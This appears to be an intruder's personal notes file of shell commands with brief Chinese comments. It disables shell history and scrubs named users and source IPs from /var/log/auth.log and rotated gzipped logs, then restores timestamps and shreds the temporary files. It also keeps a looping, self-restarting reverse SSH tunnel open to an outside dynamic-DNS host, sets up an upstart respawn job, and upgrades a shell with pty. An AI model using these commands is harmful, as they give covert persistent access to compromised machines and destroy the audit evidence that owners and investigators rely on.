
unset HISTFILE
export HISTSIZE=0
export HISTFILESIZE=0

------------------------------ liutao from 172.20.134.114 
touch /dev/shm/timestamp
touch -r /var/log/auth.log /dev/shm/timestamp
sed '/liutao/d' /var/log/auth.log > /dev/shm/backlog 
cat /dev/shm/backlog > /var/log/auth.log
touch -r /dev/shm/timestamp /var/log/auth.log
shred -n 255 -z -u /dev/shm/timestamp

touch /dev/shm/timestamp
touch -r /var/log/auth.log /dev/shm/timestamp
sed '/172\.20\.134\.114/d' /var/log/auth.log > /dev/shm/backlog 
cat /dev/shm/backlog > /var/log/auth.log
touch -r /dev/shm/timestamp /var/log/auth.log
shred -n 255 -z -u /dev/shm/timestamp
------------------------------ ends

------------------------------ xujuan from 192.168.5.138 
touch /dev/shm/timestamp
touch -r /var/log/auth.log /dev/shm/timestamp
sed '/xujuan/d' /var/log/auth.log > /dev/shm/backlog 
cat /dev/shm/backlog > /var/log/auth.log
touch -r /dev/shm/timestamp /var/log/auth.log
shred -n 255 -z -u /dev/shm/timestamp

touch /dev/shm/timestamp
touch -r /var/log/auth.log /dev/shm/timestamp
sed '/192\.168\.5\.138/d' /var/log/auth.log > /dev/shm/backlog 
cat /dev/shm/backlog > /var/log/auth.log
touch -r /dev/shm/timestamp /var/log/auth.log
shred -n 255 -z -u /dev/shm/timestamp
------------------------------ ends

python -c 'import pty; pty.spawn("/bin/sh")'

ll /var/log/auth.log.1
cat /var/log/auth.log.1 | grep 172.20

------------------------------ shred inside gz
touch /dev/shm/timestamp_gz
touch -r /var/log/auth.log.4.gz /dev/shm/timestamp_gz
gzip -d /var/log/auth.log.4.gz
touch /dev/shm/timestamp_log
touch -r /var/log/auth.log.4 /dev/shm/timestamp_log
sed '/172\.20\.134\.114/d' /var/log/auth.log.4 > /dev/shm/backlog 
cat /dev/shm/backlog > /var/log/auth.log.4
touch -r /dev/shm/timestamp_log /var/log/auth.log.4
gzip /var/log/auth.log.4
touch -r /dev/shm/timestamp_gz /var/log/auth.log.4.gz
shred -n 255 -z -u /dev/shm/timestamp_log
shred -n 255 -z -u /dev/shm/timestamp_gz
------------------------------ ends



while sleep 20
do
        set +e
        cat /tmp/aaa > /dev/null 2>&1
        if [ $? -ne 0 ]; then
                kill -9 $(ps -elf | awk '/150ou87340.iok.la/{print $4}') > /dev/null 2>&1
                sleep 60
                ssh -i /tmp/id_rsa -N -f -o ServerAliveInterval=180 -R 12348:localhost:22 root@150ou87340.iok.la -p 2323 > /dev/null 2>&1
        else
                if [ $(ps -elf | grep '150ou87340' | wc -l) -lt 2 ]; then
                        ssh -i /tmp/id_rsa -N -f -o ServerAliveInterval=180 -R 12348:localhost:22 root@150ou87340.iok.la -p 2323 > /dev/null 2>&1
                fi
        fi
        set -e
done & > /dev/null 2>&1








防止 ssh 登陆后中断
除了 client 的 ssh_config 要设置
Host *
ServerAliveInterval 30
( 可以在登陆的时候用 -o 来设置 )
还需要 server 的 sshd_config 设置
ClientAliveinterval 60




ssh -N -f -o "ServerAliveInterval 180" -R 12346:localhost:22 root@113.118.74.231 -p 2323

ssh -i /path/to/rsaKey -f -N -o "ServerAliveInterval 180" -R 55002:localhost:22 user@publicip 'sleep 365d'



start on net-device-up IFACE=eth0
stop on runlevel [01S6]
respawn
respawn limit 180 900
exec ssh -i /path/to/rsaKey -N -o "ServerAliveInterval 180" -R 55002:localhost:22 user@publicip
post-stop script
    sleep 5
end script




权限使用400
ssh -T git@github.com
 - 检测可用性
.ssh/config里边加入IdentityFile xxx/.ssh/id_rsa
 - 添加其他目录的key
